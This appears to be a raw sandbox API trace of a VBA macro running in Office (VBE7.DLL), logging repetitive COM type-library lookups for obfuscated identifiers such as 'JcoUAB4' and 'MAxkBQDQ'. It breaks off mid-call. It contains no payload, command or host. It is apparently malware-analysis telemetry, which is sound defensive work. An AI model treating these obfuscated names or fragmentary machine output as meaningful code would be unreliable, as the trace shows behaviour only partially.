[0068.501] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.501] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.501] IUnknown:Release (This=0x665ba50) returned 0xb [0068.501] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.501] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.501] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.501] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.501] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.501] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.501] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.501] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.502] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.502] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.502] IUnknown:Release (This=0x665ba50) returned 0xb [0068.502] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.502] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.502] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.502] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.502] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.502] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.502] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.503] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.503] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.503] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.503] IUnknown:Release (This=0x665ba50) returned 0xb [0068.503] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.503] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.503] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba296a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="JcoUAB4") returned 8 [0068.503] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JcoUAB4", lHashVal=0x10537d, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba296a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="JcoUAB4") returned 8 [0068.503] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JcoUAB4", lHashVal=0x10537d, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba296a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="JcoUAB4") returned 8 [0068.503] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JcoUAB4", lHashVal=0x10537d, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JcoUAB4") returned 0x10537d [0068.503] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="JcoUAB4" | out: _Dst="JcoUAB4") returned 0x0 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="JcoUAB4") returned 8 [0068.503] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.503] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JcoUAB4", lHashVal=0x10537d, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.503] IUnknown:Release (This=0x665ba50) returned 0xb [0068.504] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.504] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JcoUAB4", lHashVal=0x10537d, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.504] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.504] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.504] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JcoUAB4", lHashVal=0x10537d, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.504] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.504] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.504] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JcoUAB4", lHashVal=0x10537d, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.504] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba296a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="JcoUAB4") returned 8 [0068.504] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JcoUAB4", lHashVal=0x10537d, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.504] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.504] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba296a | out: _Dst=0x67c2d40) returned 0x0 [0068.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JcoUAB4") returned 0x105701 [0068.504] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_JcoUAB4" | out: _Dst="_B_var_JcoUAB4") returned 0x0 [0068.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_JcoUAB4") returned 15 [0068.504] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.504] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JcoUAB4", lHashVal=0x105701, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.504] IUnknown:Release (This=0x665ba50) returned 0xb [0068.504] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.504] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JcoUAB4", lHashVal=0x105701, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.504] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.504] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.504] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JcoUAB4", lHashVal=0x105701, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.504] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.504] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.504] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JcoUAB4", lHashVal=0x105701, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.504] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.504] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.504] IUnknown:Release (This=0x665ba50) returned 0xb [0068.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1eaa, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_JcoUAB4") returned 15 [0068.505] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JcoUAB4", lHashVal=0x105701, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0068.505] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba296a | out: _Dst=0x145020) returned 0x0 [0068.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a62, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ZBAA_Q") returned 7 [0068.505] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZBAA_Q", lHashVal=0x1023ed, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a62, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ZBAA_Q") returned 7 [0068.505] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZBAA_Q", lHashVal=0x1023ed, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a62, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ZBAA_Q") returned 7 [0068.505] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZBAA_Q", lHashVal=0x1023ed, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZBAA_Q") returned 0x1023ed [0068.505] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="ZBAA_Q" | out: _Dst="ZBAA_Q") returned 0x0 [0068.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="ZBAA_Q") returned 7 [0068.505] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.505] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZBAA_Q", lHashVal=0x1023ed, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.505] IUnknown:Release (This=0x665ba50) returned 0xb [0068.505] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.505] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZBAA_Q", lHashVal=0x1023ed, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.505] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.505] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.505] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZBAA_Q", lHashVal=0x1023ed, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.505] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.505] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.505] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZBAA_Q", lHashVal=0x1023ed, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.506] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a62, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ZBAA_Q") returned 7 [0068.506] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZBAA_Q", lHashVal=0x1023ed, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.506] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.506] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2a62 | out: _Dst=0x67c2d40) returned 0x0 [0068.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZBAA_Q") returned 0x109e96 [0068.506] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_ZBAA_Q" | out: _Dst="_B_var_ZBAA_Q") returned 0x0 [0068.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_ZBAA_Q") returned 14 [0068.506] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.506] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZBAA_Q", lHashVal=0x109e96, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.506] IUnknown:Release (This=0x665ba50) returned 0xb [0068.506] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.506] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZBAA_Q", lHashVal=0x109e96, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.506] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.506] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.506] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZBAA_Q", lHashVal=0x109e96, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.506] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.506] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.506] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZBAA_Q", lHashVal=0x109e96, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.506] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.506] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.506] IUnknown:Release (This=0x665ba50) returned 0xb [0068.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1eda, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_ZBAA_Q") returned 14 [0068.506] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZBAA_Q", lHashVal=0x109e96, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x5a005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x5a005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0068.506] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2a62 | out: _Dst=0x145020) returned 0x0 [0068.506] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MAxkBQDQ", lHashVal=0x104640, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a36, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="MAxkBQDQ") returned 9 [0068.507] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MAxkBQDQ", lHashVal=0x104640, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a36, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="MAxkBQDQ") returned 9 [0068.507] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MAxkBQDQ", lHashVal=0x104640, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAxkBQDQ") returned 0x104640 [0068.507] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="MAxkBQDQ" | out: _Dst="MAxkBQDQ") returned 0x0 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="MAxkBQDQ") returned 9 [0068.507] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.507] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MAxkBQDQ", lHashVal=0x104640, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.507] IUnknown:Release (This=0x665ba50) returned 0xb [0068.507] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.507] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MAxkBQDQ", lHashVal=0x104640, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.507] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.507] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.507] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MAxkBQDQ", lHashVal=0x104640, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.507] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.507] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.507] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MAxkBQDQ", lHashVal=0x104640, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.507] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a36, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="MAxkBQDQ") returned 9 [0068.507] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MAxkBQDQ", lHashVal=0x104640, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.507] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.507] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2a36 | out: _Dst=0x67c2d40) returned 0x0 [0068.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MAxkBQDQ") returned 0x101dc9 [0068.507] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_MAxkBQDQ" | out: _Dst="_B_var_MAxkBQDQ") returned 0x0 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_MAxkBQDQ") returned 16 [0068.507] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.508] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MAxkBQDQ", lHashVal=0x101dc9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.508] IUnknown:Release (This=0x665ba50) returned 0xb [0068.508] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.508] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MAxkBQDQ", lHashVal=0x101dc9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.508] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.508] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.508] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MAxkBQDQ", lHashVal=0x101dc9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.508] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.508] IUnknown:AddRef 